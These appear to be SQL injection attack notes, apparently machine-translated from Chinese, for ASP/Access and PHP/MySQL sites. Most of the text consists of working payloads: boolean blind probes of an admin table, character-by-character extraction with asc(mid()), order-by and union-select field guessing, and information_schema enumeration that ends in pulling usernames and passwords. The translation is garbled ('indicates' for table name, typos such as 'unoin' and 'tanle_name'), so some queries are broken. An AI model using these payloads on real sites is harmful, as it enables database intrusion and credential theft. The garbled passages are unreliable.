Judgment shows
(select Count(*) from admin)>=0
exists(select Count(*) from admin)
判断列明
exists(select user from admins)
and exists(select username from admin)>=0
Guess solution
Judging the field length and (select top 1 len(id) from admin)>1 Return to normal
Guess the asc code of each byte and(select top 1 asc(mid(username,2,1))from admin)>99
asc code 1-128 adopts compromise method
mid function is used to extract characters from text
mid[column name, start position, (number of characters, optional)]
mid[admin , 1,1] the first character in the admin column
top () is the line specified to be displayed
top 1 displays the first line
top2 displays the first two lines
first Display the data of the first record of the column
SELECT FIRST(OrderPrice) AS FirstOrderPrice FROM admin
count is used to display the number of rows in the specified column
select count(*) from admin
to query the number of rows in the admin table
as can create a new column to display the result
select count() as qqq from admin where id=1
The output result is
qqq
2
means there are two rows for id=2
order by error and guess the display data
1. First guess the number of fields asp?id=1 order by add a number to guess
2. Then guess the number that can be displayed asp? union select 1,2,3,..... from Indicates that if it is php, there is no need to indicate it, php has to guess first
. 3. Report an error asp? and 1=222 union select 1,2,3... from biao
4 Display data Change the number reported in error to the data to be queried unoin select 1 ,password,2 from biao
Different database injection
database level
accesss database:
database
table name
column name
content
mysql database 5.0:
database
aaaa
table name
column name
content
bbbb
table name
column name
content
assce database: brute force injection;
landing page review elements. Viewing the name element may indicate
that the database path can be downloaded with the
suffix: mdb asa asp
database suffix name.asp can still be executed on the server
mysql injection
mysql suffix myd myi frm
mysql is separated from the website directory, using remote commands to connect
mysql injection must first guess the database name and then guess the solution, the mysql database name
mysql5.0 and above exists by default information_schema stores the table names and columns under all databases Name information
information_schema.table indicates information
information_schema.columns indicates information
table.schema database name
table.name indicates
column.name indicates
group_concat(tanle.name) all indicates
mysql database operation
database version version()
database name database()
database User user()
OS @@version_compile_os
query all show php?id=1 and 1=22 union select 1, group_concat(tanle_name), 3., 4.. . . from information_schema.tables where table_schema=database name The database name needs hexadecimal code
to select the available table query, query all columns
select 1, group_concat(column_name),3.,4.. . . from information_schema.columns where table.name=table name The table name needs to be encoded in hexadecimal
Guess the content directly
select 1, list, 3., 4.. . . from shows
Summary:
guess database name
database();
guess indicates
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.TABLES where TABLE_SCHEMA=database (hex) limit 0 (starting record, 0 is the first starting record), 1 (display 1 record) —
and 1=2 union select 1,2,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x61646D696Eguess
list
and 1=2 Union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=table name (hex) limit 0,1
guess password
and 1=2 Union select 1, 2,3,username segment,5,6,7,password segment,8,9 from table name limit 0,1